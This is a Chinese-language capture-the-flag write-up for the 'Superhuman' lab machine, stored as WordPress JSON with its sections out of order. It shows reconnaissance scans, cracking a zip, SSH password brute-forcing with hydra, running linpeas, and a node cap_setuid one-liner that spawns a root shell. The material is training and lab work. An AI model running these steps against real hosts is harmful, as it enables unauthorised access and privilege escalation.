found<\/code><\/pre>\n\u4e00\u65e0\u6240\u83b7\uff0c\u770b\u5e08\u5085\u95e8\u7684wp\u662f\u5bf9Capabilities<\/code>\u6743\u9650\u8fdb\u884c\u4e86\u67e5\u8be2\uff0c\u8fd9\u65b9\u9762\u6211\u786e\u5b9e\u7f3a\u4e4f\u654f\u611f\u4e86\uff0c\u4e0b\u6b21\u4e00\u5b9a\u6ce8\u610f\uff01<\/p>\n(remote) fred@superhuman:\/$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/ping = cap_net_raw+ep\n\/usr\/bin\/node = cap_setuid+ep<\/code><\/pre>\n\u7136\u540e\u67e5\u627e\u76f8\u5173\u7684\u6f0f\u6d1e\uff0c\u53ea\u6709node\u6709\u6b64\u6f0f\u6d1e\uff1a<\/p>\n
<\/div><\/p>\n\u5c1d\u8bd5\u4e00\u4e0b\uff1a<\/p>\n
(remote) fred@superhuman:\/$ cd \/tmp\n(remote) fred@superhuman:\/tmp$ \/usr\/bin\/node -e 'process.setuid(0); require("child_process").spawn("\/bin\/sh", {stdio: [0, 1, 2]})'\n\\[\\](remote)\\[\\] \\[\\]root@superhuman\\[\\]:\\[\\]\/tmp\\[\\]$ whoami;id\nroot\nuid=0(root) gid=1000(fred) groups=1000(fred),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)\n\\[\\](remote)\\[\\] \\[\\]root@superhuman\\[\\]:\\[\\]\/tmp\\[\\]$ cd \/root\n\\[\\](remote)\\[\\] \\[\\]root@superhuman\\[\\]:\\[\\]\/root\\[\\]$ busybox ls -la\ntotal 28\ndrwx------ 3 root root 4096 Apr 2 2021 .\ndrwxr-xr-x 18 root root 4096 Mar 31 2021 ..\nlrwxrwxrwx 1 root root 9 Mar 31 2021 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc\ndrwxr-xr-x 3 root root 4096 Mar 31 2021 .local\n-rw------- 1 root root 5 Apr 2 2021 .node_repl_history\n-rw-r--r-- 1 root root 148 Aug 17 2015 .profile\n-rw-r--r-- 1 root root 16 Mar 31 2021 root.txt\n\\[\\](remote)\\[\\] \\[\\]root@superhuman\\[\\]:\\[\\]\/root\\[\\]$ cat root.txt\nImthesuperhuman<\/code><\/pre>\n\u5f97\u5230flag\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
Superhuman \u4eca\u5929\u65e9\u4e0a\u53d1\u73b0\u5df2\u7ecf\u88ab\u6628\u5929\u7b2c\u4e8c\u540d\u8d76\u4e8680\u591a\u5206\u4e86\uff0c\u5f97\u52a0\u73ed\u4e86\uff0c\u54c8\u54c8\u54c8\u3002 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf nm […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-524","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/524","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=524"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/524\/revisions"}],"predecessor-version":[{"id":525,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/524\/revisions\/525"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=524"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=524"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=524"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
nmap -sCV -p 1-65535 172.20.10.5<\/code><\/pre>\nPORT STATE SERVICE VERSION\n22\/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n| 2048 9e:41:5a:43:d8:b3:31:18:0f:2e:32:36:cf:68:c4:b7 (RSA)\n| 256 6f:24:81:b4:3d:e5:b9:c8:47:bf:b2:8b:bf:41:2d:51 (ECDSA)\n|_ 256 49:5f:c0:7a:42:20:76:76:d5:29:1a:65:bf:87:d2:24 (ED25519)\n80\/tcp open http Apache httpd 2.4.38 ((Debian))\n|_http-title: Site doesn't have a title (text\/html).\n|_http-server-header: Apache\/2.4.38 (Debian)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\ngobuster dir -u http:\/\/172.20.10.5 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,png<\/code><\/pre>\n\/server-status (Status: 403) [Size: 276]\nProgress: 1543920 \/ 1543927 (100.00%)<\/code><\/pre>\n\u6f0f\u6d1e\u626b\u63cf<\/h3>\nnikto -h http:\/\/172.20.10.5<\/code><\/pre>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 172.20.10.5\n+ Target Hostname: 172.20.10.5\n+ Target Port: 80\n+ Start Time: 2024-04-10 23:51:04 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.38 (Debian)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ \/: Server may leak inodes via ETags, header found with file \/, inode: 292, size: 5bed1a5d204c0, mtime: gzip. See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2003-1418\n+ Apache\/2.4.38 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .\n+ \/icons\/README: Apache default file found. See: https:\/\/www.vntweb.co.uk\/apache-restricting-access-to-iconsreadme\/\n+ 8102 requests: 0 error(s) and 6 item(s) reported on remote host\n+ End Time: 2024-04-10 23:51:28 (GMT-4) (24 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n\u6f0f\u6d1e\u5229\u7528<\/h2>\n\u8e29\u70b9<\/h3>\n<html><head>\n<meta http-equiv="content-type" content="text\/html; charset=windows-1252"><\/head><body><p><img src="index_fichiers\/nietzsche.jpg" alt="" style="display: block; margin-left: auto; margin-right: auto;"><\/p>\n<!--\u62c9\u5230\u6700\u5e95\u4e0b-->\n<!-- If your eye was sharper, you would see everything in motion, lol -->\n<\/body><\/html><\/code><\/pre>\n\u6ca1\u5565\u4e1c\u897f\u4e86\uff0c\u5bb3\u3002\u770b\u4e00\u4e0b\u8fd9\u4e2a\u56fe\u7247\uff1a<\/p>\n
http:\/\/172.20.10.5\/nietzsche.jpg<\/code><\/pre>\n<\/div><\/p>\n\u5c3c\u91c7\u5417\uff1f\u4e0b\u8f7d\u4e0b\u6765\uff0c\u770b\u770b\u6709\u65e0\u9690\u5199\uff1a<\/p>\n
<\/div><\/p>\n\u4f3c\u4e4e\u6709\uff0c\u4f46\u662f\u6211\u4eec\u5b57\u5178\u7206\u7834\u4e0d\u51fa\u6765\uff0c\u7b49\u4e00\u4e0b\uff0c\u5148\u540e\u53f0fuzz\u4e00\u4e0b\u76ee\u5f55\uff0c\u5c1d\u8bd5\u522b\u7684\u5b57\u5178\uff1a<\/p>\n
\u6ca1\u6709\u627e\u5230\u53ef\u4ee5fuzz\u51fa\u6765\u7684\u5b57\u5178\u3002\u3002\u3002\u3002<\/p>\n
\u4fe1\u606f\u641c\u96c6<\/h3>\n
\u5c1d\u8bd5FUZZ\u4e00\u4e0b\u76ee\u5f55\uff1a<\/p>\n
ffuf -u http:\/\/172.20.10.5\/FUZZ -w \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-big.txt -e php,txt,zip<\/code><\/pre>\n\u95f2\u7740\u7684\u65f6\u5019\u7d22\u6027\u62ffgobuster<\/code>\u6362\u4e86\u4e2a\u5b57\u5178\u91cd\u65b0\u626b\u4e86\u4e00\u4e0b\uff1a<\/p>\ngobuster dir -u http:\/\/172.20.10.5 -w \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-big.txt -x php,zip,git,jpg,txt<\/code><\/pre>\nfuzz\u7ed3\u679c\uff1a<\/p>\n
server-status [Status: 403, Size: 276, Words: 20, Lines: 10, Duration: 26ms]<\/code><\/pre>\ngobuster<\/code>\u626b\u51fa\u4e86\u4e1c\u897f\uff01<\/p>\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/172.20.10.5\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-big.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: txt,php,zip,git,jpg\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/server-status (Status: 403) [Size: 276]\n\/notes-tips.txt (Status: 200) [Size: 358]\n\/nietzsche.jpg (Status: 200) [Size: 22211]\nProgress: 7642998 \/ 7643004 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u67e5\u5230\u4e1c\u897f\u4e22\u5230cyberchef<\/code>\u89e3\u5bc6\u4e00\u4e0b\uff1a<\/p>\nhttp:\/\/172.20.10.5\/notes-tips.txt\nF(&m'D.Oi#De4!--ZgJT@;^00D.P7@8LJ?tF)N1B@:UuC\/g+jUD'3nBEb-A+De'u)F!,")@:UuC\/g(Km+CoM$DJL@Q+Dbb6ATDi7De:+g@<HBpDImi@\/hSb!FDl(?A9)g1CERG3Cb?i%-Z!TAGB.D>AKYYtEZed5E,T<)+CT.u+EM4--Z!TAA7]grEb-A1AM,)s-Z!TADIIBn+DGp?F(&m'D.R'_DId*=59NN?A8c?5F<G@:Dg*f@$:u@WF`VXIDJsV>AoD^&ATT&:D]j+0G%De1F<G"0A0>i6F<G!7B5_^!+D#e>ASuR'Df-\\,ARf.kF(HIc+CoD.-ZgJE@<Q3)D09?%+EMXCEa`Tl\/c<\/code><\/pre>\n<\/div>
\n<\/div><\/p>\nsalome doesn't want me, I'm so sad... i'm sure god is dead... \nI drank 6 liters of Paulaner.... too drunk lol. I'll write her a poem and she'll desire me. I'll name it salome_and_?? I don't know.\n\nI must not forget to save it and put a good extension because I don't have much storage.<\/code><\/pre>\n\u5f97\u5230\u654f\u611f\u76ee\u5f55\uff1asalome_and_me.zip<\/code><\/p>\n\n\u56e0\u4e3a\u540e\u9762\u63d0\u5230\u6ca1\u6709\u592a\u591a\u5185\u5b58\u4e86\u3002<\/p>\n<\/blockquote>\n
\u8bf7\u6c42\u4e00\u4e0b\u6587\u4ef6\uff1a<\/p>\n
wget http:\/\/172.20.10.5\/salome_and_me.zip<\/code><\/pre>\n<\/div><\/p>\n\u7206\u7834\u51fa\u6765\u4e86\uff01<\/p>\n
turtle<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/superhuman]\n\u2514\u2500$ cat salome_and_me.txt \n----------------------------------------------------\n GREAT POEM FOR SALOME\n----------------------------------------------------\nMy name is fred,\nAnd tonight I'm sad, lonely and scared,\nBecause my love Salome prefers schopenhauer, asshole,\nI hate him he's stupid, ugly and a peephole,\nMy darling I offered you a great switch,\nAnd now you reject my love, bitch\nI don't give a fuck, I'll go with another lady,\nAnd she'll call me BABY!<\/code><\/pre>\n\u7b11\u6b7b\u4e86\uff0c\u597d\u60e8\u554a\u3002<\/p>\n
fred\nSalome\nschopenhauer<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n
echo "fred\\nSalome\\nschopenhauer" > fuck.txt<\/code><\/pre>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/superhuman]\n\u2514\u2500$ hydra -L fuck.txt -P fuck.txt ssh:\/\/172.20.10.5 \nHydra v9.5 (c) 2023 by van Hauser\/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\n\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2024-04-11 00:49:08\n[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\n[DATA] max 9 tasks per 1 server, overall 9 tasks, 9 login tries (l:3\/p:3), ~1 try per task\n[DATA] attacking ssh:\/\/172.20.10.5:22\/\n[22][ssh] host: 172.20.10.5 login: fred password: schopenhauer\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-04-11 00:49:13<\/code><\/pre>\nfred\nschopenhauer<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) fred@superhuman:\/home\/fred$ whoami;id\nfred\nuid=1000(fred) gid=1000(fred) groups=1000(fred),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)\n(remote) fred@superhuman:\/home\/fred$ pwd\n\/home\/fred\n(remote) fred@superhuman:\/home\/fred$ ls -la\nlol<\/code><\/pre>\n\u7136\u540e\u5c31\u9000\u51fa\u6765\u4e86\uff0c\u7eb3\u5c3c\uff0c\u4e0d\u80fd\u7528ls \uff1f<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/superhuman]\n\u2514\u2500$ pwncat-cs fred@172.20.10.5 2>\/dev\/null\n[00:52:46] Welcome to pwncat \ud83d\udc08! __main__.py:164\nPassword: ************\n[00:52:47] 172.20.10.5:22: normalizing shell path manager.py:957 172.20.10.5:22: registered new host w\/ db manager.py:957\n(local) pwncat$ \n(remote) fred@superhuman:\/home\/fred$ cat user.txt \nIneedmorepower\n(remote) fred@superhuman:\/home\/fred$ echo *\ncmd.txt user.txt\n(remote) fred@superhuman:\/home\/fred$ cat cmd.txt \n"ls" command has a new name ?!! WTF !\n(remote) fred@superhuman:\/home\/fred$ WTF -la\n-bash: WTF: command not found\n(remote) fred@superhuman:\/home\/fred$ find \/-perm -u=s -type f 2>\/dev\/null\n(remote) fred@superhuman:\/home\/fred$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/bin\/passwd\n\/usr\/bin\/chsh\n\/usr\/bin\/su\n\/usr\/bin\/newgrp\n\/usr\/bin\/gpasswd\n\/usr\/bin\/mount\n\/usr\/bin\/umount\n\/usr\/bin\/chfn<\/code><\/pre>\n\u4e0a\u4f20linpeas.sh<\/code>\u901f\u901a\u4e00\u4e0b\uff1a<\/p>\n(remote) fred@superhuman:\/home\/fred$ cd \/tmp\n(remote) fred@superhuman:\/tmp$ \n(local) pwncat$ lpwd\n\/home\/kali\/temp\/superhuman\n(local) pwncat$ lcd ..\n(local) pwncat$ upload linpeas.sh\n.\/linpeas.sh \u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 860.5\/860.5 KB \u2022 ? \u2022 0:00:00[00:59:10] uploaded 860.55KiB in 0.71 seconds upload.py:76\n(local) pwncat$ \n(remote) fred@superhuman:\/tmp$ chmod +x linpeas.sh \n(remote) fred@superhuman:\/tmp$ .\/linpeas.sh \n\n \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n \u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n \u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\n \u2584\u2584\u2584\u2584 \u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\n \u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584 \u2584\n \u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584 \n \u2584\u2584 \u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\n \u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\n \u2584 \u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\n \u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\n \u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\n \u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584 \u2584 \u2584\u2584\n \u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\n \u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584 \n \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \n \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\n \u2580\u2580\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2580\u2580\u2580\u2580\u2580\u2580\n \u2580\u2580\u2580\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 \u2584\u2584\u2584\u2584\u2584\u2584\u2580\u2580\n \u2580\u2580\u2580\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2580\u2580\u2580\n\n \/---------------------------------------------------------------------------------\\\n | Do you like PEASS? |\n |---------------------------------------------------------------------------------|\n | Get the latest version : https:\/\/github.com\/sponsors\/carlospolop |\n | Follow on Twitter : @hacktricks_live |\n | Respect on HTB : SirBroccoli |\n |---------------------------------------------------------------------------------|\n | Thank you! |\n \\---------------------------------------------------------------------------------\/\n linpeas-ng by carlospolop\n\nADVISORY: This script should be used for authorized penetration testing and\/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and\/or with the computer owner's permission.\n\nLinux Privesc Checklist: https:\/\/book.hacktricks.xyz\/linux-hardening\/linux-privilege-escalation-checklist\n LEGEND:\n RED\/YELLOW: 95% a PE vector\n RED: You should take a look to it\n LightCyan: Users with console\n Blue: Users without console & mounted devs\n Green: Common things (users, groups, SUID\/SGID, mounts, .sh scripts, cronjobs) \n LightMagenta: Your username\n\n Starting linpeas. Caching Writable Folders...\n\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Basic information \u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\nOS: Linux version 4.19.0-16-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.181-1 (2021-03-19)\nUser & Groups: uid=1000(fred) gid=1000(fred) groups=1000(fred),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)\nHostname: superhuman\nWritable folder: \/dev\/shm\n[+] \/usr\/bin\/ping is available for network discovery (linpeas can discover hosts, learn more with -h)\n[+] \/usr\/bin\/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)\n[+] \/usr\/bin\/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)\nCaching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\n\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 System Information \u2560\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Operative system\n\u255a https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation#kernel-exploits\nLinux version 4.19.0-16-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.181-1 (2021-03-19)\nDistributor ID: Debian\nDescription: Debian GNU\/Linux 10 (buster)\nRelease: 10\nCodename: buster\n\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Sudo version\nsudo Not Found\n\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 PATH\n\u255a https:\/\/book.hacktricks.xyz\/linux-hardening\/privilege-escalation#writable-path-abuses\n\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games:\/sbin:\/usr\/sbin:\/usr\/local\/sbin\n\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Date & uptime\nThu 11 Apr 2024 12:59:27 AM EDT\n 00:59:27 up 1:13, 1 user, load average: 0.16, 0.39, 2.55\n\n\u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2563 Any sd*\/disk* disk in \/dev? (limit 20)\nKilled<\/code><\/pre>\n\u554a\u8fd9\u3002\u3002\u3002\u3002\u771f\u662f\u88ab\u901f\u901a\u4e86\u3002\u3002\u3002\u3002<\/p>\n
\u518d\u6b21\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n
(remote) fred@superhuman:\/tmp$ echo *\nlinpeas.sh systemd-private-193640687eb64794bc31630a1457f638-apache2.service-0FkQXg systemd-private-193640687eb64794bc31630a1457f638-systemd-timesyncd.service-KTkU3P\n(remote) fred@superhuman:\/tmp$ cd \/\n(remote) fred@superhuman:\/$ echo *\nbin boot dev etc home initrd.img initrd.img.old lib lib32 lib64 libx32 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz vmlinuz.old\n(remote) fred@superhuman:\/$ cd \/etc\n(remote) fred@superhuman:\/etc$ echo *\nadduser.conf adjtime alternatives apache2 apm apparmor apparmor.d apt bash.bashrc bash_completion bindresvport.blacklist binfmt.d ca-certificates ca-certificates.conf calendar console-setup cron.d cron.daily cron.hourly cron.monthly crontab cron.weekly dbus-1 debconf.conf debian_version default deluser.conf dhcp dictionaries-common discover.conf.d discover-modprobe.conf dpkg emacs environment fstab gai.conf groff group group- grub.d gshadow gshadow- gss hdparm.conf host.conf hostname hosts hosts.allow hosts.deny init.d initramfs-tools inputrc iproute2 issue issue.net kernel kernel-img.conf ldap ld.so.cache ld.so.conf ld.so.conf.d libaudit.conf locale.alias locale.gen localtime logcheck login.defs logrotate.conf logrotate.d machine-id magic magic.mime mailcap mailcap.order manpath.config mime.types mke2fs.conf modprobe.d modules modules-load.d motd mtab nanorc network networks nsswitch.conf opt os-release pam.conf pam.d passwd passwd- perl profile profile.d protocols python python2.7 python3 python3.7 rc0.d rc1.d rc2.d rc3.d rc4.d rc5.d rc6.d rcS.d reportbug.conf resolv.conf rmt rpc rsyslog.conf rsyslog.d securetty security selinux services shadow shadow- shells skel ssh ssl subgid subgid- subuid subuid- sysctl.conf sysctl.d systemd terminfo timezone tmpfiles.d ucf.conf udev ufw update-motd.d vim wgetrc X11 xattr.conf xdg\n(remote) fred@superhuman:\/etc$ cd \/opt;echo *\n*\n(remote) fred@superhuman:\/opt$ echo *\n*\n(remote) fred@superhuman:\/opt$ cd \/var\/www\/html\n(remote) 